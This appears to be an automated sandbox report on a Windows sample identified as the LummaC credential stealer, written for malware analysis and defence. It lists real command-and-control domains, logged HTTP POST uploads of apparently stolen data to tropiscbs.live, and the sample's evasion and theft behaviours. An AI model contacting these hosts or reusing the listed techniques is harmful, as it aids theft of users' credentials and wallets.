Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Sender.exe

Overview

General Information

Sample name:Sender.exe
Analysis ID:1675540
MD5:39e94524e19c217d1f19208a42a12947
SHA1:32ecfdad659adfc975c9bf3ac8f9c07d807392ac
SHA256:4ba36a1aa022e87ce24ff7030e64e630d3652d7d5ab5ebb8368f27ebad47bcc3
Tags:exeuser-LuRisa323
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • Sender.exe (PID: 4768 cmdline: "C:\Users\user\Desktop\Sender.exe" MD5: 39E94524E19C217D1F19208A42A12947)
  • cleanup

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "tropiscbs.live/iuwxx",
    "geographys.run/eirq",
    "woodpeckersd.run/glsk",
    "cartograhphy.top/ixau",
    "biosphxere.digital/tqoa",
    "topographky.top/xlak",
    "climatologfy.top/kbud",
    "vigorbridgoe.top/banb"
  ],
  "Build id": "0BD90D4887DDF55E6B8590FC3CEF03F7"
}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.2.Sender.exe.a00000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-27T18:36:32.751218+020020283713Unknown Traffic192.168.2.449710104.21.77.203443TCP
      2025-04-27T18:36:34.823970+020020283713Unknown Traffic192.168.2.449711104.21.77.203443TCP
      2025-04-27T18:36:36.252016+020020283713Unknown Traffic192.168.2.449712104.21.77.203443TCP
      2025-04-27T18:36:37.688311+020020283713Unknown Traffic192.168.2.449715104.21.77.203443TCP
      2025-04-27T18:36:40.067823+020020283713Unknown Traffic192.168.2.449717104.21.77.203443TCP
      2025-04-27T18:36:41.654673+020020283713Unknown Traffic192.168.2.449718104.21.77.203443TCP
      2025-04-27T18:36:44.706836+020020283713Unknown Traffic192.168.2.449721104.21.77.203443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-27T18:36:32.751218+020020618601Domain Observed Used for C2 Detected192.168.2.449710104.21.77.203443TCP
      2025-04-27T18:36:34.823970+020020618601Domain Observed Used for C2 Detected192.168.2.449711104.21.77.203443TCP
      2025-04-27T18:36:36.252016+020020618601Domain Observed Used for C2 Detected192.168.2.449712104.21.77.203443TCP
      2025-04-27T18:36:37.688311+020020618601Domain Observed Used for C2 Detected192.168.2.449715104.21.77.203443TCP
      2025-04-27T18:36:40.067823+020020618601Domain Observed Used for C2 Detected192.168.2.449717104.21.77.203443TCP
      2025-04-27T18:36:41.654673+020020618601Domain Observed Used for C2 Detected192.168.2.449718104.21.77.203443TCP
      2025-04-27T18:36:44.706836+020020618601Domain Observed Used for C2 Detected192.168.2.449721104.21.77.203443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-27T18:36:32.180353+020020618591Domain Observed Used for C2 Detected192.168.2.4533041.1.1.153UDP

      Joe Sandbox Signatures

      • AV Detection
      • Compliance
      • Networking
      • System Summary
      • Data Obfuscation
      • Hooking and other Techniques for Hiding and Protection
      • Malware Analysis System Evasion
      • Language, Device and Operating System Detection
      • Lowering of HIPS / PFW / Operating System Security Settings
      • Stealing of Sensitive Information
      • Remote Access Functionality

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Sender.exeAvira: detected
      Source: https://tropiscbs.live:443/iuwxxDAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live/Avira URL Cloud: Label: malware
      Source: https://tropiscbs.live/PgYAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live/iuwxxAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live//gVAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live/hgAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live:443/iuwxxAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live/iuwxxoYAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live:443/iuwxxbcryptPrimitives.dllAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live/iuwxxuuAvira URL Cloud: Label: malware
      Source: https://tropiscbs.live/=gDAvira URL Cloud: Label: malware
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["tropiscbs.live/iuwxx", "geographys.run/eirq", "woodpeckersd.run/glsk", "cartograhphy.top/ixau", "biosphxere.digital/tqoa", "topographky.top/xlak", "climatologfy.top/kbud", "vigorbridgoe.top/banb"], "Build id": "0BD90D4887DDF55E6B8590FC3CEF03F7"}
      Source: Sender.exeVirustotal: Detection: 70%Perma Link
      Source: Sender.exeReversingLabs: Detection: 66%
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: tropiscbs.live/iuwxx
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: geographys.run/eirq
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: woodpeckersd.run/glsk
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: cartograhphy.top/ixau
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: biosphxere.digital/tqoa
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: topographky.top/xlak
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: climatologfy.top/kbud
      Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmpString decryptor: vigorbridgoe.top/banb
      Source: Sender.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: Sender.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2061859 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live) : 192.168.2.4:53304 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49715 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49711 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49721 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49712 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49710 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49718 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49717 -> 104.21.77.203:443
      Source: Malware configuration extractorURLs: tropiscbs.live/iuwxx
      Source: Malware configuration extractorURLs: geographys.run/eirq
      Source: Malware configuration extractorURLs: woodpeckersd.run/glsk
      Source: Malware configuration extractorURLs: cartograhphy.top/ixau
      Source: Malware configuration extractorURLs: biosphxere.digital/tqoa
      Source: Malware configuration extractorURLs: topographky.top/xlak
      Source: Malware configuration extractorURLs: climatologfy.top/kbud
      Source: Malware configuration extractorURLs: vigorbridgoe.top/banb
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49711 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49715 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49712 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49710 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49718 -> 104.21.77.203:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.21.77.203:443
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 41Host: tropiscbs.live
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=b9KQrht4nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19566Host: tropiscbs.live
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Gnf88AvpKC995AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 8748Host: tropiscbs.live
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CCvd1Ar39E9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20386Host: tropiscbs.live
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3Q5bUbGM7QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2221Host: tropiscbs.live
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G439QGWWjdM6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 551525Host: tropiscbs.live
      Source: global trafficHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 79Host: tropiscbs.live
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: tropiscbs.live
      Source: unknownHTTP traffic detected: POST /iuwxx HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 41Host: tropiscbs.live
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
      Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
      Source: Sender.exe, Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244298918.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.0000000000657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/
      Source: Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live//gV
      Source: Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/=gD
      Source: Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/PgY
      Source: Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/hg
      Source: Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxx
      Source: Sender.exe, 00000000.00000003.1192811300.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192689490.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192773770.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxxoY
      Source: Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxxuu
      Source: Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live:443/iuwxx
      Source: Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live:443/iuwxxD
      Source: Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live:443/iuwxxbcryptPrimitives.dll
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
      Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
      Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
      Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006D14EA0_3_006D14EA
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CA5790_3_006CA579
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CACD00_3_006CACD0
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CAA030_3_006CAA03
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006D14EA0_3_006D14EA
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CAA030_3_006CAA03
      Source: Sender.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Sender.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9898781819908815
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\Sender.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Sender.exe, 00000000.00000003.1178448012.0000000002F6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: Sender.exeVirustotal: Detection: 70%
      Source: Sender.exeReversingLabs: Detection: 66%
